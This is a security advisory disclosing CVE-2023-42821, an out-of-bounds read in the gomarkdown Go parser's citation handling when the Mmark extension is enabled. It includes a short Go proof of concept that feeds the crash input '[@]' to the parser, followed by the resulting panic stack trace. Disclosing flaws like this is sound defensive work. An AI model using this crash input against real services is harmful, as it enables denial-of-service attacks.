CVE-2023-42821: Out-of-bounds Read while parsing citations

Package

gomod markdown (Go)

Affected versions

7478c23

Summary

Parsing malformed markdown input with parser that uses parser.Mmark extension could result in out-of-bounds read vulnerability.

Details

To exploit the vulnerability, parser needs to have parser.Mmark extension set. The panic occurs inside the citation.go file on the line 69 when the parser tries to access the element past its length.

PoC

package main

import ( “github.com/gomarkdown/markdown” “github.com/gomarkdown/markdown/parser” )

func main() { ext := parser.CommonExtensions | parser.Attributes | parser.OrderedListStart | parser.SuperSubscript | parser.Mmark p := parser.NewWithExtensions(ext)

inp := \[\]byte("\[@\]")
markdown.ToHTML(inp, p, nil)

}

$ go run main.go panic: runtime error: index out of range [1] with length 1

goroutine 1 [running]: github.com/gomarkdown/markdown/parser.citation(0x10?, {0x1400000e3f0, 0x14000141801?, 0x3}, 0x0?) /Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/parser/citation.go:69 +0x544 github.com/gomarkdown/markdown/parser.link(0x14000152000?, {0x1400000e3f0?, 0x3?, 0x3?}, 0x14000141ad8?) /Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/parser/inline.go:308 +0x1c0 github.com/gomarkdown/markdown/parser.(*Parser).Inline(0x14000152000, {0x102d87f48, 0x14000076180}, {0x1400000e3f0, 0x3, 0x3}) /Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/parser/inline.go:38 +0xb8 github.com/gomarkdown/markdown/parser.(*Parser).Parse.func1({0x102d87f48?, 0x14000076180}, 0x0?) /Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/parser/parser.go:307 +0x8c github.com/gomarkdown/markdown/ast.NodeVisitorFunc.Visit(0x140000106e0?, {0x102d87f48?, 0x14000076180?}, 0x68?) /Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/ast/node.go:574 +0x38 github.com/gomarkdown/markdown/ast.Walk({0x102d87f48, 0x14000076180}, {0x102d87348, 0x140000106e0}) /Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/ast/node.go:546 +0x58 github.com/gomarkdown/markdown/ast.Walk({0x102d877b0, 0x14000076120}, {0x102d87348, 0x140000106e0}) /Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/ast/node.go:557 +0x144 github.com/gomarkdown/markdown/ast.WalkFunc(…) /Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/ast/node.go:580 github.com/gomarkdown/markdown/parser.(*Parser).Parse(0x14000152000, {0x1400000e3f0?, 0x0?, 0x0?}) /Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/parser/parser.go:304 +0x16c github.com/gomarkdown/markdown.Parse({0x1400000e3f0?, 0x3f?, 0x14000141e38?}, 0x102c6b43c?) /Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/markdown.go:53 +0x6c github.com/gomarkdown/markdown.ToHTML({0x1400000e3f0?, 0x0?, 0x60?}, 0x0?, {0x0, 0x0}) /Users/demon/go/pkg/mod/github.com/gomarkdown/[email protected]/markdown.go:77 +0x30 main.main() /Users/demon/tools/markdown_cve_poc/main.go:17 +0x5c exit status 2

Impact

Denial of Service / panic